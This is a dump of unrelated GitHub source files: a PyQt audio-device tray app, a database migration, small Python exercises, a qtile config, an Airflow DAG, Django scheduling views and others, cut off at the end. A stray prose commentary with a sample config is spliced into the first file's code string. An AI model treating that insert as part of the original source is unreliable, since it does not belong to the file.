self.menu.setWindowFlags(self.menu.windowFlags() | Qt.FramelessWindowHint | Qt.NoDropShadowWindowHint)\n self.menu.setAttribute(Qt.WA_TranslucentBackground)\n self.menu.setStyleSheet(f\"\"\"\n QMenu{{\n background-color: #FFFFFF;\n border-image: url(\"{CONTEXT_MENU_BG_FILE_PATH.replace(os.sep, '/')}\") 0 stretch;\n border-radius: 10px;\n }}\n QMenu::item {{\n background-color: transparent;\n padding: 5px 5px;\n margin: 10px 10px;\n }}\n QMenu::item:selected \n {{\n background-color: #fc8c29;\n border-radius: 5px;\n }}\n QMenu::item:disabled {{\n background-color: transparent;\n color: #ffffff;\n font-weight: bold;\n }}\n QMenu::indicator:non-exclusive:checked {{\n image: url(\"{CONTEXT_MENU_CHECKED_FILE_PATH.replace(os.sep, '/')}\");\n }}\n QMenu::indicator:non-exclusive:checked:selected {{\n image: url(\"{CONTEXT_MENU_CHECKED_SELECTED_FILE_PATH.replace(os.sep, '/')}\");\n }}\n QMenu::indicator:non-exclusive:unchecked {{\n image: url(\"{CONTEXT_MENU_UNCHECKED_FILE_PATH.replace(os.sep, '/')}\");\n }}\n QMenu::indicator:non-exclusive:unchecked:selected {{\n image: url(\"{CONTEXT_MENU_UNCHECKED_SELECTED_FILE_PATH.replace(os.sep, '/')}\");\n }}\n QMenu::right-arrow {{\n image: url(\"{CONTEXT_MENU_ARROW.replace(os.sep, '/')}\");\n }}\n QMenu::right-arrow:selected {{\n image: url(\"{CONTEXT_MENU_ARROW_SELECTED.replace(os.sep, '/')}\");\n }}\n \"\"\")\n\n self.act_device = self.menu.addAction(\"Enforce Audio Device\")\n self.act_device.setEnabled(False)\n\n # Creating config sub menu\n self.config_menu = QMenu(\"Config\")\n self.config_menu.setWindowFlags(self.menu.windowFlags() | Qt.FramelessWindowHint | Qt.NoDropShadowWindowHint)\n self.config_menu.setAttribute(Qt.WA_TranslucentBackground)\n self.config_menu.setStyleSheet(\"\"\"\n QMenu{\n background-color: #ffffff;\n border: 5px solid #FFFFFF;\n border-radius: 10px;\n }\n QMenu::item {\n background-color: transparent;\n padding: 5px 5px;\n margin: 5px 5px;\n }\n QMenu::item:selected \n { \n background-color: #fc8c29;\n border-radius: 5px\n }\n QMenu::item:disabled {\n background-color: transparent;\n color: #ffffff;\n font-weight: bold;\n }\n \"\"\")\n\n # 
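One thing worth noting: the default config written above maps each app to a bare device string ('MyExampleApp1.exe': "MyExampleAudioDevice"), but add_app() expects a mapping with a 'Device' key and an optional 'Delay' (clamped to 0-60 seconds). A config that would actually pass that validation presumably looks like this (device name and paths are placeholders):

import json

config = {
    "Config": {"SoundVolumeViewPath": "SoundVolumeView.exe"},
    "Apps": {
        # each app maps to a dict, not a bare device string
        "MyGame.exe": {"Device": "Speakers", "Delay": 2},
    },
}
print(json.dumps(config, indent=2))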
Create reload config option\n self.act_reload = self.config_menu.addAction(\n \"Reload Config\", self.app.start_reload_config)\n\n self.config_menu.addSeparator()\n\n # Create open config file option\n self.act_open_config = self.config_menu.addAction(\n \"Open Config\", self.open_config_file)\n\n # Create open config folder option\n self.act_open_config_dir = self.config_menu.addAction(\n \"Go to Config\", self.open_config_folder)\n\n self.config_menu.addSeparator()\n\n # Create open log option\n self.act_open_log = self.config_menu.addAction(\n \"Open Log\", self.open_log_file)\n\n # add the config menu to the menu\n self.act_open_config_menu = self.menu.addMenu(self.config_menu)\n\n # Create reset audio devices button\n self.act_reset = self.menu.addAction(\n \"Reset audio devices\", self.app.reset_processes)\n\n # Create autostart option\n self.act_autostart = self.menu.addAction(\n \"Launch on Boot\", self.toggle_autostart_state)\n self.act_autostart.setCheckable(True)\n\n self.menu.addSeparator()\n\n # Create quit option\n self.act_quit = self.menu.addAction(\"Quit\", self.app.start_quit)\n\n # Adding options to the System Tray\n self.setContextMenu(self.menu)\n\n # ------------------------------------------------------------------------------------------\n\n def toggle_autostart_state(self):\n current_state = self.app.settings.contains(APP_NAME)\n new_state = not current_state\n if current_state:\n self.app.settings.remove(APP_NAME)\n else:\n self.app.settings.setValue(APP_NAME, sys.argv[0])\n self.act_autostart.setChecked(new_state)\n logging.info(\n f'Added {APP_NAME} to autostart' if new_state else f'Removed {APP_NAME} from autostart')\n\n # ------------------------------------------------------------------------------------------\n\n def open_config_folder(self):\n path = os.path.dirname(CONFIG_FILE_PATH)\n os.startfile(path)\n\n # ------------------------------------------------------------------------------------------\n\n def open_config_file(self):\n os.startfile(CONFIG_FILE_PATH)\n\n # ------------------------------------------------------------------------------------------\n\n def open_log_file(self):\n os.startfile(LOG_FILE_PATH)\n\n\n# ------------------------------------------------------------------------------------------\n\ndef check_already_running():\n c = wmi.WMI()\n process_name = os.path.basename(sys.argv[0])\n process_count = 0\n for process in c.Win32_Process(name=process_name):\n process_count = process_count + 1\n # two processes are from us, if there are more than 2, another instance is already running\n if process_count > 2:\n return True\n return False\n\n# ------------------------------------------------------------------------------------------\n\n\nif __name__ == '__main__':\n if not check_already_running():\n app = EnforceAudioDeviceApp(sys.argv)\n sys.exit(app.exec_())\n","repo_name":"TheCoCe/EnforceAudioDevice","sub_path":"EnforceAudioDevice.py","file_name":"EnforceAudioDevice.py","file_ext":"py","file_size_in_byte":29019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36506601948","text":"#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. 
You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\"\"\"Clean hashmap fields constraints.\n\nRevision ID: c88a06b1cfce\nRevises: f8c799db4aa0\nCreate Date: 2016-05-19 18:06:43.315066\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = 'c88a06b1cfce'\ndown_revision = 'f8c799db4aa0'\n\nfrom alembic import op # noqa: E402\nimport sqlalchemy as sa # noqa: E402\n\n\ndef upgrade():\n with op.batch_alter_table(\n 'hashmap_fields',\n # NOTE(sheeprine): Forced reflection is needed because of SQLAlchemy's\n # SQLite backend limitation reflecting ON DELETE clauses.\n reflect_args=[\n sa.Column(\n 'service_id',\n sa.Integer,\n sa.ForeignKey(\n 'hashmap_services.id',\n ondelete='CASCADE',\n name='fk_hashmap_fields_service_id_hashmap_services'),\n nullable=False)]) as batch_op:\n batch_op.drop_constraint(\n 'uniq_field',\n type_='unique')\n batch_op.create_unique_constraint(\n 'uniq_field_per_service',\n ['service_id', 'name'])\n batch_op.drop_constraint(\n 'uniq_map_service_field',\n type_='unique')\n","repo_name":"openstack/cloudkitty","sub_path":"cloudkitty/rating/hash/db/sqlalchemy/alembic/versions/c88a06b1cfce_clean_hashmap_fields_constraints.py","file_name":"c88a06b1cfce_clean_hashmap_fields_constraints.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","stars":140,"dataset":"github-code","pt":"53"} +{"seq_id":"2134564742","text":"def is_number(x):\n operator = ['+', '*']\n bracket = ['(', ')']\n if x not in operator + bracket:\n return True\n\n\ndef icp(x):\n if x == '*':\n return 2\n elif x == '+':\n return 1\n elif x == '(':\n return 3\n\n\ndef isp(x):\n if x == '*':\n return 2\n elif x == '+':\n return 1\n elif x == '(':\n return 0\n\n\ndef calc(operator, y, x):\n if operator == '+':\n return int(x) + int(y)\n elif operator == '*':\n return int(x)*int(y)\n\n\nfor tc in range(1, 11):\n input()\n stack = []\n result = ''\n for i in input():\n if is_number(i):\n result += i\n elif i == ')':\n while True:\n top = stack.pop()\n if top == '(':\n break\n result += top\n else:\n while stack:\n if icp(i) > isp(stack[-1]):\n stack.append(i)\n break\n else:\n result += stack.pop()\n else:\n stack.append(i)\n while stack:\n result += stack.pop()\n\n for i in result:\n if is_number(i):\n stack.append(i)\n else:\n stack.append(calc(i, stack.pop(), stack.pop()))\n print(f'#{tc} {stack.pop()}')\n","repo_name":"WoosubLeee/algorithm-study","sub_path":"SWEA/D04/1224_계산기3.py","file_name":"1224_계산기3.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"69888690729","text":"from libqtile import layout, hook\nfrom libqtile.config import Group\n\nfrom modules.keys import get_keys, get_mouse\nfrom modules.layouts import get_layouts\nfrom modules.screens import get_screens\nfrom subprocess import run\n\nwidget_defaults = dict(\n font='sans',\n fontsize=12,\n padding=3,\n)\nextension_defaults = widget_defaults.copy()\n\nscreens = []\n\nmeta = \"mod4\"\n\ngroups = [Group(name=i[0], label=i[1]) for i in [(\"F1\", \"work\"), (\"F2\", \"calibre\"), (\"F3\", \"internet\"), (\"F4\", \"discord\"), 
(\"F5\", \"etc\")]]\n\nkeys = get_keys(groups)\n\nlayouts = get_layouts()\n\n\n# Drag floating layouts.\nmouse = get_mouse()\n\ndgroups_key_binder = None\ndgroups_app_rules = []\n\n\n\nfollow_mouse_focus = False\nbring_front_click = True\ncursor_warp = False\nfloating_layout = layout.Floating(float_rules=[\n {'wmclass': 'confirm'},\n {'wmclass': 'dialog'},\n {'wmclass': 'download'},\n {'wmclass': 'error'},\n {'wmclass': 'file_progress'},\n {'wmclass': 'notification'},\n {'wmclass': 'splash'},\n {'wmclass': 'toolbar'},\n {'wmclass': 'confirmreset'}, # gitk\n {'wmclass': 'makebranch'}, # gitk\n {'wmclass': 'maketag'}, # gitk\n {'wname': 'branchdialog'}, # gitk\n {'wname': 'pinentry'}, # GPG key password entry\n {'wmclass': 'ssh-askpass'}, # ssh-askpass\n])\nauto_fullscreen = True\nfocus_on_window_activation = \"smart\"\n\n# XXX: Gasp! We're lying here. In fact, nobody really uses or cares about this\n# string besides java UI toolkits; you can see several discussions on the\n# mailing lists, GitHub issues, and other WM documentation that suggest setting\n# this string if your java app doesn't work correctly. We may as well just lie\n# and say that we're a working one by default.\n#\n# We choose LG3D to maximize irony: it is a 3D non-reparenting WM written in\n# java that happens to be on java's whitelist.\nwmname = \"LG3D\"\n\n\ndef main(q):\n screens.clear()\n for screen in get_screens():\n screens.append(screen)\n\n\n@hook.subscribe.screen_change\ndef restart_on_randr(qtile, ev):\n run(\"xrandr --auto\".split())\n run(\"xrandr --output HDMI-1 --right-of eDP-1\".split())\n qtile.cmd_restart()\n\n\n@hook.subscribe.client_new\ndef func(c):\n if c.name in [\"Discord\", \"Activité - Discord\", \"Discord Updater\", \"Telegram\"]:\n c.togroup(\"F4\")\n elif c.name in [\"Mozilla Firefox\"]:\n c.togroup(\"F3\")\n elif c.name in [\"calibre\", \"V calibre\"]:\n c.togroup(\"F2\")\n elif c.name in [\"PyCharm\", \"IntelliJ IDEA\", \"Clion\", \"win0\"]:\n c.togroup(\"F1\")\n","repo_name":"Ara0n/qtile","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23725085784","text":"parar = False\n\nsoma = cont = 0\n\nwhile not parar:\n num = int(input('Digite um número [999 para parar]: '))\n if num != 999:\n soma += num\n cont += 1\n else:\n parar = True\n\nprint(f'Você digitou {cont} números e a soma entre eles foi {soma}.')\n\n# PROFESSOR FEZ ASSIM:\n\nnum_1 = cont_1 = soma_1 = 0\n\nnum_1 = int(input('Digite um número [999 para parar]: '))\n\nwhile num_1 != 999:\n soma_1 += num_1\n cont_1 += 1\n num_1 = int(input('Digite um número [999 para parar]: '))\n\nprint(f'Você digitou {cont_1} números e a soma entre eles foi {soma_1}.')\n","repo_name":"welderessutti/exercises_and_studies","sub_path":"curso_em_video/python/ex064.py","file_name":"ex064.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"15797537486","text":"from datetime import date\nimport csv\nimport argparse\n\nimport Command\nimport settings\n\nfrom admin.Init import load_from_csv, create_new_database, load_data_from_files\nimport analytics.Summation\nimport analytics.Category\nfrom analytics import calcpack\nfrom settings import f2s\n\n\ndef list_entries(date_begin, date_end):\n ts = analytics.Summation.TransactionService()\n entries = ts.find(settings.create_date(date_begin), 
settings.create_date(date_end))\n for e in entries:\n print(e)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-f\", \"--file\", help=\"CSV input file\", dest=\"csv_data_in\")\n parser.add_argument(\"-p\", \"--file-pattern\", help=\"CSV input files pattern\",\n dest=\"csv_file_pattern\")\n parser.add_argument(\"-i\", \"--initialize\", help=\"create new database\", action=\"store_true\",\n default=False)\n parser.add_argument(\"-c\", \"--command\", help=\"Use command syntax to list entries\", dest=\"command_string\")\n options = parser.parse_args()\n if options.initialize is True:\n create_new_database()\n if options.csv_file_pattern is not None and options.csv_data_in is not None:\n print(\"Choose -f or -p, not both of them\")\n exit(0)\n if options.csv_data_in is not None:\n csv_data_in = options.csv_data_in\n with open(csv_data_in, newline='', encoding='ansi') as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=';', quotechar='\"')\n load_from_csv(csv_reader)\n if options.csv_file_pattern is not None:\n load_data_from_files(options.csv_file_pattern)\n if options.command_string is not None:\n cmd = Command.Command.create(options.command_string)\n [print(i) for i in cmd.run()]\n exit(0)\n\n list_entries('2018-01-01', '2018-05-01')\n # exit(0)\n year_begin = 2018\n year_end = 2019\n month_interval = 3\n result = calcpack.calculate_interval(year_begin, year_end, month_interval)\n for r in result:\n try: \n print(\"[\", r[0], r[1], \")\", flush=True)\n except:\n print(\"error\", flush=True)\n print(\"Expences: \", r[2], flush=True)\n try:\n print(\"Income: \", r[3], flush=True)\n except:\n print(\"error\", flush=True)\n ts = analytics.Summation.TransactionService()\n entries = ts.find(date(year_begin, 1, 1), date(year_end, 1, 1))\n salary = []\n expences = []\n for e in entries:\n if e.amount() > 0:\n salary.append(e.amount())\n else:\n expences.append(e.amount())\n cp = calcpack.CalcPack(salary)\n salary_sum = cp.sum()\n cp = calcpack.CalcPack(expences)\n expences_sum = cp.sum()\n print(\"Salary on [%d, %d): \" % (year_begin, year_end), f2s(salary_sum))\n print(\"Expences on [%d, %d): \" % (year_begin, year_end), f2s(expences_sum))\n print(\"Diff on [%d, %d): \" % (year_begin, year_end), f2s(salary_sum + expences_sum))\n\n s = analytics.Summation.Summation()\n for y in range(year_begin-1, year_end, 1):\n year_sum = s.sum_year(y)\n print(y, f2s(year_sum), f2s(s.sum_year_transfer_amount(y, '57105015041000002310394032')))\n\n entries = ts.find(date(year_begin, 1, 1), date(year_end, 1, 1))\n xxx = 0\n cnt = 0\n for e in entries:\n c = analytics.Category.Category()\n cat_id = c.guess(e)\n if cat_id == analytics.Category.CategoryId(analytics.Category.CategoryId.id_6):\n xxx += e.amount()\n cnt += 1\n print(e.date(), f2s(e.amount()), f2s(xxx), c.description(cat_id), flush=True)\n data = {\n 0 : [], -100 : [], -300 : [], -600 : [], -900 : []\n }\n entries = ts.find(date(year_begin, 1, 1), date(year_end, 1, 1))\n saldo = 0\n for e in entries:\n if e.amount() > 5000:\n print(e.date(), f2s(e.amount()), f2s(e.saldo_after_transaction()),\n f2s(e.saldo_after_transaction() - saldo), flush=True)\n saldo = e.saldo_after_transaction()\n entries = ts.find(date(year_begin, 1, 1), date(year_end, 1, 1))\n exp = 0\n for e in entries:\n amt = e.amount()\n c = analytics.Category.Category()\n cat_id = c.guess(e)\n if cat_id is None:\n if amt < 0 and amt >= -100:\n data[0].append(amt)\n elif amt < -100 and amt >= -300:\n data[-100].append(amt)\n elif amt < -300 and 
amt >= -600:\n                data[-300].append(amt)\n            elif amt < -600 and amt >= -900:\n                data[-600].append(amt)\n            elif amt < -900:\n                data[-900].append(amt)\n    for k in data:\n        cp = calcpack.CalcPack(data[k])\n        if len(data[k]) > 0:\n            print(\"%4d\" % k, cp)","repo_name":"aw84/py_lab_02","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":4759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72020623849","text":"from airflow import DAG\nfrom airflow.operators.python import PythonOperator\nfrom airflow.operators.empty import EmptyOperator\n\nfrom airflow.utils.dates import days_ago\nfrom datetime import timedelta\n\nimport time\n\ndefault_args = {\n    'start_date': days_ago(1),\n    'retries': 1,\n    'retry_delay': timedelta(minutes=5),\n}\n\ndef _sleep_func(sleep_time):\n    print('Start sleep {sleep_time} seconds'.format(sleep_time=sleep_time))\n    time.sleep(sleep_time)\n\n# schedule_interval, catchup and tags are DAG-level arguments; placed inside\n# default_args they are silently ignored, so they are passed to DAG() here\nwith DAG(\n    dag_id='python-op',\n    default_args=default_args,\n    schedule_interval='@daily',\n    catchup=False,\n    tags=['training']\n) as dag:\n    start = EmptyOperator(task_id='start_task')\n    end = EmptyOperator(task_id='end_task')\n\n    task1 = PythonOperator(\n        task_id='python_callable_task1',\n        python_callable=_sleep_func,\n        op_kwargs={\"sleep_time\": 10}\n    )\n\n    start >> task1 >> end\n","repo_name":"yoonjk/airflow-handson","sub_path":"lab01/python-op.py","file_name":"python-op.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10376280887","text":"import allure\n\nfrom integration.tests.basic.helpers.basic import BaseMixin\n\n\n@allure.feature(\"Opcodes verifications\")\n@allure.story(\"Unsupported opcode\")\nclass TestUnsupportedOpcodes(BaseMixin):\n\n    def test_basefee(self):\n        contract, _ = self.web3_client.deploy_and_get_contract(\n            \"EIPs/EIP3198_basefee\", \"0.8.10\", self.sender_account, contract_name=\"basefeeCaller\")\n        basefee = contract.functions.baseFee().call()\n        assert basefee == 0\n","repo_name":"neonevm/neon-tests","sub_path":"integration/tests/basic/opcodes/test_unsupported_opcodes.py","file_name":"test_unsupported_opcodes.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"7913750046","text":"import datetime\nfrom django.views.generic.edit import FormView\nfrom django.views.generic import ListView, CreateView, UpdateView\nfrom django.http import HttpResponse, HttpResponseRedirect, Http404\nfrom django.utils.translation import gettext_lazy as _\nfrom django.db.models import Q\nfrom django.shortcuts import render\nfrom .storage import fs\nfrom .man_forms import *\nfrom .models import ScheduleRequest, Schedule, Token, AppointmentHistory\nfrom hosman_web.models import Patient\nfrom hosman_web.modules.storage import store_gContent\n\nclass HistoricalRecordCreateView(CreateView):\n    form_class = HistoricalRecordForm\n    template_name = 'site/edit/record_keep.html'\n    def get(self, request, *args, **kwargs):\n        self.object = None\n        context = self.get_context_data()\n        i = int(request.path.split('/')[5])\n        token = Token.objects.get(id=i)\n        context['form'].fields['date'].initial = token.date\n        context['form'].fields['doctor'].initial = token.schedule.doctor\n        context['form'].fields['patient'].initial = token.patient\n        context['form'].fields['center'].initial = request.site\n        return
self.render_to_response(context)\n def post(self, request, *args, **kwargs):\n form = self.form_class(request.POST, request.FILES)\n if form.is_valid():\n obj = form.save(commit=False)\n media = request.FILES['content']\n obj.content = media\n print(fs.location)\n print(\"=\"*80)\n obj = store_gContent(obj.patient.user.username, obj, location=fs.location+'/')\n obj.save()\n url = f\"../../../../../update/{Token.objects.get(id=int(request.path.split('/')[5])).schedule.id}/token/\"\n return HttpResponseRedirect(url)\n return render(request, self.template_name, {'form': form})\n\nclass TokenView(ListView):\n model = Token\n template_name = 'site/token.html'\n def get(self, request, *args, **kwargs):\n if request.user.is_authenticated and request.user.is_manager:\n self.object_list = self.model._default_manager.filter(schedule=int(request.path.replace('/', ' ').split()[3]))\n allow_empty = self.get_allow_empty()\n if not allow_empty:\n if self.get_paginate_by(self.object_list) is not None and hasattr(self.object_list, 'exists'):\n is_empty = not self.object_list.exists()\n else:\n is_empty = not self.object_list\n if is_empty:\n raise Http404(_('Empty list and “%(class_name)s.allow_empty” is False.') % {\n 'class_name': self.__class__.__name__,\n })\n context = self.get_context_data()\n return self.render_to_response(context)\n return HttpResponse('Error 610!')\n\nclass TokenCreateView(CreateView):\n form_class = TokenForm\n template_name = 'site/edit/token.html'\n success_url = \"../\"\n def get(self, request, *args, **kwargs):\n self.object = None\n context = self.get_context_data()\n i = int(request.path.replace('/', ' ').split()[3])\n schedule = Schedule.objects.get(id=i)\n serial = Token.objects.filter(schedule=schedule).count()\n day = datetime.date.today()\n wd = day.weekday()\n timedelta = schedule.day_of_week - wd if schedule.day_of_week > wd else schedule.day_of_week + 7 - wd if schedule.day_of_week < wd else 0\n day += datetime.timedelta(days=timedelta)\n context['form'].fields['schedule'].initial = schedule\n context['form'].fields['date'].initial = day\n context['form'].fields['serial'].initial = serial + 1\n if request.user.is_authenticated:\n patient = Patient.objects.get(user=request.user)\n revisit = AppointmentHistory.objects.filter(patient=patient, doctor=schedule.doctor, center=schedule.center).count() > 0\n context['form'].fields['tokenie_logged'].initial = True\n context['form'].fields['revisit'].initial = revisit\n context['form'].fields['patient_name'].initial = patient.__str__()\n context['form'].fields['patient'].initial = patient\n else:\n context['form'].fields['patient'].initial = request.user\n return self.render_to_response(context)\n\nclass ScheduleCreateView(CreateView):\n form_class = ScheduleForm\n template_name = 'site/edit/schedule.html'\n success_url = '../'\n def post(self, request, *args, **kwargs):\n self.object = None\n form = self.get_form()\n if form.is_valid():\n obj = form.save()\n sr = ScheduleRequest.objects.create(schedule=obj, made_by=Patient.objects.get(user=request.user), request=\"C\")\n sr.save()\n return HttpResponseRedirect(self.success_url)\n return render(request, self.template_name, {'form': form})\n def get(self, request, *args, **kwargs):\n if request.user.is_authenticated and request.user.is_manager:\n self.object = None\n context = self.get_context_data()\n context['form'].fields['center'].initial = request.site\n if request.privilege == 'employee':\n context['form'].fields['receptionist'].initial = request.user\n elif 
request.privilege == 'doctor':\n                context['form'].fields['doctor'].initial = request.user\n            super().get(request, *args, **kwargs)\n            return self.render_to_response(context)\n        return HttpResponse(\"Error 610\")\n\nclass ScheduleView(ListView):\n    model = Schedule\n    template_name = 'site/schedule.html'\n    def get(self, request, *args, **kwargs):\n        if request.user.is_authenticated and request.user.is_manager:\n            self.object_list = self.model._default_manager.filter(center=request.site)\n            srs = ScheduleRequest.objects.filter(schedule__center=request.site)\n            for sr in srs:\n                # filter on the stored FK value instead of fetching each related Schedule\n                self.object_list = self.object_list.exclude(id=sr.schedule_id)\n            allow_empty = self.get_allow_empty()\n            if not allow_empty:\n                if self.get_paginate_by(self.object_list) is not None and hasattr(self.object_list, 'exists'):\n                    is_empty = not self.object_list.exists()\n                else:\n                    is_empty = not self.object_list\n                if is_empty:\n                    raise Http404(_('Empty list and “%(class_name)s.allow_empty” is False.') % {\n                        'class_name': self.__class__.__name__,\n                    })\n            context = self.get_context_data()\n            return self.render_to_response(context)\n        return HttpResponse('Error 610!')\n\nclass ScheduleUpdateView(UpdateView):\n    model = Schedule\n    form_class = ScheduleForm\n    template_name = 'site/edit/schedule.html'\n    success_url = \"../../\"\n    def post(self, request, *args, **kwargs):\n        form = self.get_form()\n        if form.is_valid():\n            retain_old = self.get_object()\n            sr_test = ScheduleRequest.objects.filter(schedule__center=retain_old.center, schedule__office_no=retain_old.office_no, request=\"R\")\n            obj = form.save()\n            if sr_test.count() == 0:\n                dup_old = Schedule.objects.create(\n                    start_time=retain_old.start_time,\n                    end_time=retain_old.end_time,\n                    day_of_week=retain_old.day_of_week,\n                    office_no=retain_old.office_no,\n                    phone=retain_old.phone,\n                    fee_1st=retain_old.fee_1st,\n                    fee_revisit=retain_old.fee_revisit,\n                    receptionist=retain_old.receptionist,\n                    doctor=retain_old.doctor,\n                    center=retain_old.center\n                )\n                dup_old.save()\n                sr_ret = ScheduleRequest.objects.create(schedule=dup_old, made_by=Patient.objects.get(user=request.user), request=\"R\", ref_id=obj.id)\n                sr_ret.save()\n            else:\n                # bind the row once: every sr_test[0] lookup runs a fresh query and\n                # returns a new instance, so the attribute edits were being lost\n                sr_update = sr_test[0]\n                sr_update.made_by = Patient.objects.get(user=request.user)\n                sr_update.ref_id = obj.id\n                sr_update.save()\n                if sr_test.count() > 1:\n                    for i in range(1, len(sr_test)):\n                        sr_test[i].delete()\n            retain_old.delete()\n            sr = ScheduleRequest.objects.create(schedule=obj, made_by=Patient.objects.get(user=request.user), request=\"U\")\n            sr.save()\n            return HttpResponseRedirect(self.success_url)\n        return render(request, self.template_name, {'form': form})\n    def get(self, request, *args, **kwargs):\n        if request.user.is_authenticated and request.user.is_manager:\n            self.object = self.get_object()\n            return super().get(request, *args, **kwargs)\n        return HttpResponse(\"Error 610!\")","repo_name":"8lurry/heartbeat","sub_path":"editorial/man_views.py","file_name":"man_views.py","file_ext":"py","file_size_in_byte":8908,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"71282377129","text":"from features.pages.base_page import BasePage\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.common.exceptions import NoSuchElementException\n\n\nclass AccountFunction(BasePage):\n    def __init__(self, driver):\n        super().__init__(driver)\n        self.action = ActionChains(driver)\n        self.URL = \"https://magento.softwaretestingboard.com/customer/account/\"\n\n    def check_contain(self, message):\n        # find_element raises NoSuchElementException rather than returning a\n        # falsy value, so the presence check has to catch the exception\n        try:
            self.driver.find_element(By.XPATH, f'//div[contains(text(),\"{message}\")]')\n        except NoSuchElementException:\n            return False\n        return True\n\n    def hover_button(self, value):\n        select_elem = self.driver.find_element(By.XPATH, f'{value}')\n        self.action.move_to_element(select_elem).perform()\n","repo_name":"MadalinaDiana/Luma-Magento-eCommerce","sub_path":"features/pages/functionality_account.py","file_name":"functionality_account.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35444221484","text":"\ndef stats(sorted_stats):\n    print(sorted_stats)\n\n\n# {'Peter': ['OOP', 350], 'George': ['OOP', 300], 'Simo': ['Advanced', 600], 'Prakash': ['OOP', 300, 'Advanced', 250], 'Ani': ['JSCore', 400]}\n# [('Simo', 600), ('Prakash', 550), ('Ani', 400), ('Peter', 350), ('George', 300)]\ndef print_result(contest_dict, user_dict, sorted_stats):\n    print(user_dict)\n    print(contest_dict)\n    stats(sorted_stats)\n\n\ndef individual_statistics():\n    pass\n\n\ndef dict_manager(username, contest, points, contest_dict, user_dict, sorted_stats):\n    if username not in user_dict.keys():\n        user_dict[username] = [contest, points]\n    if user_dict[username][0] == contest and user_dict[username][1] < points:\n        user_dict[username][1] = points\n    if user_dict[username][0] != contest:\n        user_dict[username] += contest, points\n\n    # keep [user, best_points, ...] per contest; the original keyed the lookup\n    # on contest_dict.values() (never true for a bare username) and stored\n    # tuples, so the in-place score update raised a TypeError\n    if contest not in contest_dict:\n        contest_dict[contest] = [username, points]\n    elif username not in contest_dict[contest]:\n        contest_dict[contest] += username, points\n    else:\n        idx = contest_dict[contest].index(username)\n        if contest_dict[contest][idx + 1] < points:\n            contest_dict[contest][idx + 1] = points\n\n    individual_stats = {}\n    for name, value in user_dict.items():\n        total = 0\n        for current_value in value:\n            if type(current_value) == int:\n                total += current_value\n        individual_stats[name] = total\n    sorted_stats = sorted(individual_stats.items(), key=lambda x: x[1], reverse=True)\n    return contest_dict, user_dict, sorted_stats\n\n\ndef judge(contest_dict, user_dict):\n    sorted_stats = {}\n    while True:\n        command = input()\n        if command == \"no more time\":\n            print_result(contest_dict, user_dict, sorted_stats)\n            break\n        username, contest, points = command.split(\" -> \")\n        points = int(points)\n        contest_dict, user_dict, sorted_stats = dict_manager(username, contest, points, contest_dict, user_dict,\n                                                             sorted_stats)\n\n\nuser_dict = {}\ncontest_dict = {}\njudge(contest_dict, user_dict)\n","repo_name":"maon0002/Programming-Fundamentals-with-Python-September-December-2022","sub_path":"dictionaries__more_exercises/02_judge.py","file_name":"02_judge.py","file_ext":"py","file_size_in_byte":2608,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"7021089625","text":"from hashlib import md5\nfrom flask_mail import Message, Mail\nfrom rq import get_current_job, Queue\nfrom app import app, mail\nimport requests\nimport os\nimport sqlite3\n\ndef run_sql(query):\n    connection = sqlite3.connect(\"tasks.db\")\n
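# --- illustrative aside, not part of the corpus records above or below ---
# run_sql in the hash-service record interpolates the token and URL straight
# into the SQL text with % formatting, which is an injection risk. A minimal
# sketch of the same helper using sqlite3 parameter binding; the extra
# `params` argument is an assumption for illustration, not part of the repo.
import sqlite3

def run_sql_safe(query, params=()):
    connection = sqlite3.connect("tasks.db")
    cursor = connection.cursor()
    cursor.execute(query, params)   # '?' placeholders are bound, never spliced
    res = cursor.fetchall()
    connection.commit()
    connection.close()
    return res

# usage sketch:
# run_sql_safe("INSERT INTO tasks VALUES (?, ?, ?, ?)", (token, "", url, 0))
# --- end aside ---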
